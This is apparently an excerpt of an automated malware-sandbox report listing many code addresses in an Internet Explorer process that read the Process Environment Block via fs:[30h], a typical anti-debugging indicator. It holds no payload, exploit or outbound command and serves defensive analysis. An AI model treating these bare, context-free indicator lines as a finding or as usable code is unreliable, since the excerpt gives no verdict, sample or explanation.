                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333B256 mov eax, dword ptr fs:[00000030h]5_2_0333B256
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333B256 mov eax, dword ptr fs:[00000030h]5_2_0333B256
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B724D mov eax, dword ptr fs:[00000030h]5_2_032B724D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279240 mov eax, dword ptr fs:[00000030h]5_2_03279240
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279240 mov eax, dword ptr fs:[00000030h]5_2_03279240
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03286259 mov eax, dword ptr fs:[00000030h]5_2_03286259
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327A250 mov eax, dword ptr fs:[00000030h]5_2_0327A250
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902A0 mov eax, dword ptr fs:[00000030h]5_2_032902A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902A0 mov eax, dword ptr fs:[00000030h]5_2_032902A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov eax, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov eax, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov ecx, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov ecx, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033172A0 mov eax, dword ptr fs:[00000030h]5_2_033172A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033172A0 mov eax, dword ptr fs:[00000030h]5_2_033172A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov ecx, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BE284 mov eax, dword ptr fs:[00000030h]5_2_032BE284
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BE284 mov eax, dword ptr fs:[00000030h]5_2_032BE284
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03300283 mov eax, dword ptr fs:[00000030h]5_2_03300283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03300283 mov eax, dword ptr fs:[00000030h]5_2_03300283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03300283 mov eax, dword ptr fs:[00000030h]5_2_03300283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B329E mov eax, dword ptr fs:[00000030h]5_2_032B329E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B329E mov eax, dword ptr fs:[00000030h]5_2_032B329E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355283 mov eax, dword ptr fs:[00000030h]5_2_03355283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902E1 mov eax, dword ptr fs:[00000030h]5_2_032902E1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902E1 mov eax, dword ptr fs:[00000030h]5_2_032902E1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902E1 mov eax, dword ptr fs:[00000030h]5_2_032902E1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F2F8 mov eax, dword ptr fs:[00000030h]5_2_0333F2F8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033552E2 mov eax, dword ptr fs:[00000030h]5_2_033552E2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032792FF mov eax, dword ptr fs:[00000030h]5_2_032792FF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032892C5 mov eax, dword ptr fs:[00000030h]5_2_032892C5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032892C5 mov eax, dword ptr fs:[00000030h]5_2_032892C5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B2D3 mov eax, dword ptr fs:[00000030h]5_2_0327B2D3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B2D3 mov eax, dword ptr fs:[00000030h]5_2_0327B2D3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B2D3 mov eax, dword ptr fs:[00000030h]5_2_0327B2D3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AF2D0 mov eax, dword ptr fs:[00000030h]5_2_032AF2D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AF2D0 mov eax, dword ptr fs:[00000030h]5_2_032AF2D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B0124 mov eax, dword ptr fs:[00000030h]5_2_032B0124
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03281131 mov eax, dword ptr fs:[00000030h]5_2_03281131
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03281131 mov eax, dword ptr fs:[00000030h]5_2_03281131
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03340115 mov eax, dword ptr fs:[00000030h]5_2_03340115
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov ecx, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov eax, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov eax, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov eax, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03319179 mov eax, dword ptr fs:[00000030h]5_2_03319179
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355152 mov eax, dword ptr fs:[00000030h]5_2_03355152
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279148 mov eax, dword ptr fs:[00000030h]5_2_03279148
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279148 mov eax, dword ptr fs:[00000030h]5_2_03279148
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279148 mov eax, dword ptr fs:[00000030h]5_2_03279148
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279148 mov eax, dword ptr fs:[00000030h]5_2_03279148
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327C156 mov eax, dword ptr fs:[00000030h]5_2_0327C156
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03314144 mov eax, dword ptr fs:[00000030h]5_2_03314144
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03314144 mov eax, dword ptr fs:[00000030h]5_2_03314144
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03314144 mov ecx, dword ptr fs:[00000030h]5_2_03314144
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03314144 mov eax, dword ptr fs:[00000030h]5_2_03314144
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03314144 mov eax, dword ptr fs:[00000030h]5_2_03314144
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03287152 mov eax, dword ptr fs:[00000030h]5_2_03287152
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03286154 mov eax, dword ptr fs:[00000030h]5_2_03286154
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03286154 mov eax, dword ptr fs:[00000030h]5_2_03286154
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033311A4 mov eax, dword ptr fs:[00000030h]5_2_033311A4
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033311A4 mov eax, dword ptr fs:[00000030h]5_2_033311A4
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033311A4 mov eax, dword ptr fs:[00000030h]5_2_033311A4
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033311A4 mov eax, dword ptr fs:[00000030h]5_2_033311A4
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329B1B0 mov eax, dword ptr fs:[00000030h]5_2_0329B1B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C0185 mov eax, dword ptr fs:[00000030h]5_2_032C0185
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330019F mov eax, dword ptr fs:[00000030h]5_2_0330019F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330019F mov eax, dword ptr fs:[00000030h]5_2_0330019F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330019F mov eax, dword ptr fs:[00000030h]5_2_0330019F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330019F mov eax, dword ptr fs:[00000030h]5_2_0330019F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327A197 mov eax, dword ptr fs:[00000030h]5_2_0327A197
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327A197 mov eax, dword ptr fs:[00000030h]5_2_0327A197
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327A197 mov eax, dword ptr fs:[00000030h]5_2_0327A197
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333C188 mov eax, dword ptr fs:[00000030h]5_2_0333C188
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333C188 mov eax, dword ptr fs:[00000030h]5_2_0333C188
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D7190 mov eax, dword ptr fs:[00000030h]5_2_032D7190
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A51EF mov eax, dword ptr fs:[00000030h]5_2_032A51EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032851ED mov eax, dword ptr fs:[00000030h]5_2_032851ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033561E5 mov eax, dword ptr fs:[00000030h]5_2_033561E5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B01F8 mov eax, dword ptr fs:[00000030h]5_2_032B01F8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033461C3 mov eax, dword ptr fs:[00000030h]5_2_033461C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033461C3 mov eax, dword ptr fs:[00000030h]5_2_033461C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BD1D0 mov eax, dword ptr fs:[00000030h]5_2_032BD1D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BD1D0 mov ecx, dword ptr fs:[00000030h]5_2_032BD1D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033551CB mov eax, dword ptr fs:[00000030h]5_2_033551CB
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE1D0 mov eax, dword ptr fs:[00000030h]5_2_032FE1D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE1D0 mov eax, dword ptr fs:[00000030h]5_2_032FE1D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE1D0 mov ecx, dword ptr fs:[00000030h]5_2_032FE1D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE1D0 mov eax, dword ptr fs:[00000030h]5_2_032FE1D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE1D0 mov eax, dword ptr fs:[00000030h]5_2_032FE1D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327A020 mov eax, dword ptr fs:[00000030h]5_2_0327A020
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327C020 mov eax, dword ptr fs:[00000030h]5_2_0327C020
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334903E mov eax, dword ptr fs:[00000030h]5_2_0334903E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334903E mov eax, dword ptr fs:[00000030h]5_2_0334903E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334903E mov eax, dword ptr fs:[00000030h]5_2_0334903E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334903E mov eax, dword ptr fs:[00000030h]5_2_0334903E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E016 mov eax, dword ptr fs:[00000030h]5_2_0329E016
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E016 mov eax, dword ptr fs:[00000030h]5_2_0329E016
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E016 mov eax, dword ptr fs:[00000030h]5_2_0329E016
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E016 mov eax, dword ptr fs:[00000030h]5_2_0329E016
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355060 mov eax, dword ptr fs:[00000030h]5_2_03355060
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov ecx, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291070 mov eax, dword ptr fs:[00000030h]5_2_03291070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AC073 mov eax, dword ptr fs:[00000030h]5_2_032AC073
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FD070 mov ecx, dword ptr fs:[00000030h]5_2_032FD070
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332705E mov ebx, dword ptr fs:[00000030h]5_2_0332705E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332705E mov eax, dword ptr fs:[00000030h]5_2_0332705E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03282050 mov eax, dword ptr fs:[00000030h]5_2_03282050
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB052 mov eax, dword ptr fs:[00000030h]5_2_032AB052
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033460B8 mov eax, dword ptr fs:[00000030h]5_2_033460B8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033460B8 mov ecx, dword ptr fs:[00000030h]5_2_033460B8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328208A mov eax, dword ptr fs:[00000030h]5_2_0328208A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D08D mov eax, dword ptr fs:[00000030h]5_2_0327D08D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B909C mov eax, dword ptr fs:[00000030h]5_2_032B909C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AD090 mov eax, dword ptr fs:[00000030h]5_2_032AD090
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AD090 mov eax, dword ptr fs:[00000030h]5_2_032AD090
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03285096 mov eax, dword ptr fs:[00000030h]5_2_03285096
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032880E9 mov eax, dword ptr fs:[00000030h]5_2_032880E9
